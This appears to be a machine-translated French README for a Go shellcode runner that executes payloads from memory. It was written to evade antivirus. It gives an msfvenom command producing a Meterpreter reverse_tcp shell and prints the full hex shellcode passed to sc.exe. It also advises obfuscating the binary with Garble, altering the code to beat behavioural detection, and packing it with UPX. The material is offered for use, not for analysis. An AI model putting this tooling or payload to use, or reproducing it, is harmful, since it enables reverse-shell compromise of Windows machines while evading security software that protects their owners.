Il s'agit d'un programme pour exécuter ShellCode comme son propre processus, le tout depuis la mémoire. Cela a été écrit pour vaincre la détection antivirus. Cela est maintenant détecté comme Virtool: Win32 / Shrine.A. Utilisez un outil comme Garble pour obscurcir le binaire pour vaincre l'analyse statique. Changez le code vous-même pour vaincre l'analyse du comportement.
Gardez à l'esprit que seulement ShellCode 64 bits s'exécutera dans un processus 64 bits. Cela ne peut pas autodétecter automatiquement votre architecture Shellcode.
Utilisez MSFvenom ou Metasploit pour générer un peu de shellcode sous forme de format hexagonal:
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
Parfois, le shellcode est plus grand que la limite d'une ligne de commande avec des arguments. Essayez plutôt de mettre le tout dans un script par lots.
Étapes de construction standard. Définissez Goos sur windows et Goarch sur la même chose que votre shellcode, soit 386 ou amd64 . Cela ne peut pas détecter l'architecture de votre shellcode.
Le binaire résultant est un peu grand, 2,1 m, mais se comprime bien avec UPX, environ 508K.